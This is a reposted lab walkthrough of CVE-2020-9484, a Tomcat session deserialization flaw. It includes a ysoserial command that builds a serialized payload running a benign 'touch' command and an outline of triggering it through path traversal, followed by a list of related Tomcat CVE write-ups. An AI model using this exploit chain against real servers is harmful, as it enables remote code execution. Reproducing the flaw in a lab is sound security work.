Apache #Tomcat CVE-2020-9484

CVE-2020-9484

Reproduce Apache Tomcat Session deserialization code execution vulnerability with Kali 2.0 CVE-2020-9484

surroundings:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (webapp is s2-053, added commons-collections4-4.0.jar under its lib)

start up

/yourtomcatdir/bin/startup.sh 

 

 

Generate payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

use

First visit S2-053 to see if it starts normally:http://192.168.152.128:8080/s2-053/ 

 

 


Re-access the packet capture and use intruder for path traversal

 

 


 

 

 

The command is executed successfully:

https://github.com/IdealDreamLast/CVE-2020-9484/raw/master/img/ok.png

This article is transferred fromhttps://github.com/IdealDreamLast/CVE-2020-9484/

Intelligent Recommendation

CVE-2020-1938 Apache-Tomcat-Ajp vulnerability reproduction

table of Contents I. Overview 1.1 Vulnerability ID: CVE-2020-1938 1.2 Hazard Class: High 1.3 Description Second, the impact of version Third, the vulnerability analysis Fourth, reproduce step Environm...

Apache Tomcat AJP file contains vulnerability recurrence (CVE-2020-10487)

Sphere of influence: tomcat 7:<7.0.100 tomcat 8: <7.5.51 tomcat 9: <9.0.31 Conditions of use: 1. Within the scope of the vulnerability version. 2. The ajp service is enabled by default. Vulne...

CVE-2020-1938 Apache Tomcat file contains vulnerability

Vulnerability description Tomcat is a servlet container developed in the Jakarta project of the Apache Software Foundation. Tomcat server is a free and open source web application server, which is wid...

Turn: Apache Tomcat CVE-2020-1938 and security defense

What is this loophole Recently (February 20, 2020) Apache Tomcat broke a high-risk server file containment vulnerability (CVE-2020-1938). According to the vulnerability description on the National Inf...

Apache Tomcat file contains vulnerability (CVE-2020-1938)

Vulnerability introduction Vulnerability number: CVE-2020-1938 Vulnerability details: Apache Tomcat will open the AJP connector to facilitate interaction with other web servers through the AJP protoco...

More Recommendation

The Apache Tomcat file contains the vulnerability reproduction (CVE-2020-1938)

The Apache Tomcat file contains the vulnerability reproduction (CVE-2020-1938) Preface influences Numbering Environment setup Vulnerability recurrence Reference article Preface influences Numbering CN...

CVE-2020-13935-Reproduction of denial of service vulnerability in Apache Tomcat

CVE-2020-13935-Apache Tomcat Denial of Service Vulnerability 1. Vulnerability description 2. Impact version 3. Vulnerability investigation 4. Vulnerability exploitation 5. Bug fixes 1. Vulnerability d...

(CVE-2020-1938) Apache Tomcat remote code execution vulnerability reproduction

Vulnerability introduction Apache Tomcat is an open source implementation of Java Servlet, JavaServer Pages, Java Expression Language and WebSocket technologies. Tomcat provides a "pure Java"...

File contains vulnerabilities-Apache Tomcat (CVE-2020-1938)

File inclusion vulnerability exists in Apache Tomcat The vulnerability is caused by a flaw in the Tomcat AJP protocol Attackers can exploit this vulnerability by constructing specific parameters,Read ...

File inclusion vulnerability exists in Apache Tomcat server (CVE-2020-1938)

  There is a file inclusion vulnerability in the Apache Tomcat server. Attackers can use this vulnerability to read or include any files under all webapp directories on Tomcat, such as webapp con...

Copyright  DMCA © 2018-2026 - All Rights Reserved - www.programmersought.com  User Notice

Top